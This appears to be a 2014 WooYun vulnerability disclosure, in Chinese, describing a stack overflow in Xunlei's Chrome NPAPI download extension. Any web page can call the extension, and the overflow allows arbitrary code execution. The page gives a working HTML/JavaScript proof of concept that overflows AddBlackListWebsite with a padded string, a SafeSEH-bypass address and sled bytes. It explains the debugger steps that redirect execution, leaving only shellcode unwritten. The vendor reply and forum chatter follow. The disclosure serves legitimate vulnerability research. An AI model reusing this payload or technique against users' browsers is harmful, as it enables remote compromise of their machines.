当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060702

漏洞标题:迅雷chrome插件栈溢出可导致执行任意代码

相关厂商:迅雷

漏洞作者: fate0

提交时间:2014-05-14 14:49

修复时间:2014-08-12 14:50

公开时间:2014-08-12 14:50

漏洞类型:远程代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-14: 细节已通知厂商并且等待厂商处理中
2014-05-16: 厂商已经确认,细节仅向厂商公开
2014-05-19: 细节向第三方安全合作伙伴开放
2014-07-10: 细节向核心白帽子及相关领域专家公开
2014-07-20: 细节向普通白帽子公开
2014-07-30: 细节向实习白帽子公开
2014-08-12: 细节向公众公开

简要描述:

迅雷是迅雷公司开发的互联网下载软件。迅雷是一款基于多资源超线程技术的
下载软件.安装迅雷时,向导会建议用户安装相关浏览器扩展,其中chrome浏览器
下的Thunder Download Extension for Chrome扩展(简称迅雷chrome扩展)存
在栈溢出漏洞,安装了迅雷chrome扩展的用户在浏览恶意网页时,可能执行任意代码.
thanks: 金龟子

详细说明:

版本:

chrome_xl_extesion.png


测试环境:
win 2003 默认配置
查看迅雷chrome扩展manifest.json文件时,发现该扩展使用了NPAPI(Netscape
Plugin Application Programming Interface,网景插件应用程序接口)实现了xl_chrome.dll,
并且public属性为true,所以xl_chrome可以被任意网页调用.

xl_chrome_plugin_public.png


POC:

<embed type="application/xl_chrome_plugin" id="xl_chrome_plugin">
<script>
   var plugin = document.getElementById("xl_chrome_plugin");
  
  function exploit() {
  
	var i = 0;
	var exploit_string = '';
	var nop = '\x72\x00\x72\x00';  // jz next_code;
	var safeseh_addr = '\x0b\x0b\x27\x00'; // call [ebp+30h]
	var jz_seh_addr = '\x74\x22\x74\x22'; // skip seh
	while (i < 20012) {
		i += 1;
		exploit_string += 'a';
	}
	exploit_string += jz_seh_addr;
	exploit_string += safeseh_addr;
	
	i = 0;
	while (i < 20000) {
		i += 1;
		exploit_string += '\x72\x00\x72\x00'; // nop
	}
	
	plugin.AddBlackListWebsite(exploit_string);
  }
</script>
// 大wooyun把一个正斜杠 替换成两个正斜杠了


xl_chrome实现的AddBlackListWebsite存在栈溢出(AddBlackListPage应该也有,其他未作测试)
利用mona查看程序相关保护

2014-05-14 上午4.47.31.png


嗯。。。需要bypass SafeSEH,查找bypass SafeSEH的地址

2014-05-14 上午4.21.14.png


最后选择0x00270b0b作为跳转地址
命令行

chrome.exe --plugin-startup-dialog


Immunity Debugger 附加到chrome弹出对话框显示的进程id,chrome打开上面POC网页,F12打开console,输入exploit() (为了方便调试写成一个函数),会触发一个写异常

2014-05-14 上午4.30.21.png


忘记说了,因为程序带有GS,所以只能通过覆盖SafeSEH,触发异常来进入异常处理函数,
这个时候异常链已经被我们覆盖成

2014-05-14 上午4.30.47.png


其中的0x00270B0B就是我们选取bypass SafeSEH的地址

2014-05-14 上午4.33.55.png


最后又回到了我们可控的地方

2014-05-14 上午4.34.53.png


剩下的就是shellcode的问题了

漏洞证明:

修复方案:

NPAPI,google早就说要弃用了吧,为什么大迅雷还敢继续用

版权声明:转载请注明来源 fate0@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-05-16 10:14

厂商回复:

感谢您的反馈,正在修正这个问题,另外弃用NPAPI插件是在我们的计划之中的,新插件还在测试中。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-14 14:57 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    前排围观tar挂服务大牛

  2. 2014-05-14 14:58 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    前排围观tar挂服务大牛

  3. 2014-05-14 14:58 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    前排围观tar挂服务大牛

  4. 2014-05-14 14:59 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    前排围观tar挂服务大牛

  5. 2014-05-14 15:28 | JinGuiZi ( 路人 | Rank:30 漏洞数:6 | 。。)

    前排围观tar挂服务大牛

  6. 2014-05-14 15:46 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  7. 2014-05-14 15:57 | 小新 ( 普通白帽子 | Rank:129 漏洞数:19 | 我可是要成为普通白帽子的小新)

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  8. 2014-05-14 15:58 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  9. 2014-05-14 15:58 | fate0 ( 普通白帽子 | Rank:110 漏洞数:4 | hello from fate0)

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  10. 2014-05-14 16:08 | 银狼_avi ( 实习白帽子 | Rank:55 漏洞数:13 | 本屌十二岁破处)

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  11. 2014-05-14 16:09 | 小人物Reno ( 普通白帽子 | Rank:471 漏洞数:110 | X)

    @fate0 你要秒杀 猪猪侠吗? 求带,大牛!4-100

  12. 2014-05-14 16:14 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    @肉肉 哇,肉肉大仙,现身了!出大事的节奏。。!

  13. 2014-05-14 16:18 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    这是tar挂服务大牛主场哦,不要闹

  14. 2014-05-14 16:30 | Comer ( 普通白帽子 | Rank:336 漏洞数:40 | 关注安全 | 关注智能漏洞挖掘)

    这是tar挂服务大牛主场哦,不要闹

  15. 2014-05-14 16:35 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    靠,赶紧保留版本,好好研究

  16. 2014-05-14 16:46 | 冰冻冷咖啡 ( 路人 | Rank:5 漏洞数:2 | 菜鸟一只)

    围观大牛们

  17. 2014-05-14 17:14 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  18. 2014-05-14 18:46 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    哇塞,大牛啊!你参加乌云众测了吗?

  19. 2014-05-14 19:57 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    呜呜呜,大牛啊!你4个漏洞rank就100了!坑爹啊!

  20. 2014-05-14 19:58 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @浅兮 可以一起玩均分wb的游戏

  21. 2014-05-14 19:59 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    @xsser 不懂!你也很假啊!rank249怎么拿到核心白帽子了...

  22. 2014-05-14 20:02 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @浅兮 ... 潜规则

  23. 2014-05-14 20:04 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    @xsser 还是不懂!

  24. 2014-05-15 02:37 | vace ( 路人 | Rank:15 漏洞数:1 | 影子是一个会撒谎的精灵,它在虚空中流浪和...)

    前排围观tar挂服务大牛

  25. 2014-05-15 12:20 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    升土豪的节奏啊。不是精华就是现金。。。

  26. 2014-05-16 10:42 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @xsser ....

  27. 2014-05-16 11:41 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @光刃

  28. 2014-05-19 11:54 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @xsser 不懂!你也很假啊!rank249怎么拿到核心白帽子了

  29. 2014-05-19 18:28 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    @xsser 小吨吨,,你娃吭啊

  30. 2014-05-24 00:16 | study_vul ( 实习白帽子 | Rank:62 漏洞数:9 | 我有乌云id了,我马上就要牛叉起来了)

    @xsser 不懂!你也很假啊!rank249怎么拿到核心白帽子了

  31. 2014-06-05 13:23 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    87

  32. 2014-08-12 16:19 | daige ( 路人 | Rank:1 漏洞数:1 )

    金龟子。。。

  33. 2014-08-12 17:17 | chock ( 实习白帽子 | Rank:58 漏洞数:15 | 今夜我们都是wooyun人,我们一定要收购长亭)

    难怪我的迅雷插件现在用不了了,看来迅雷公司停止了?

  34. 2014-08-13 14:36 | My5t3ry ( 实习白帽子 | Rank:31 漏洞数:13 )

    前排围观tar挂服务大牛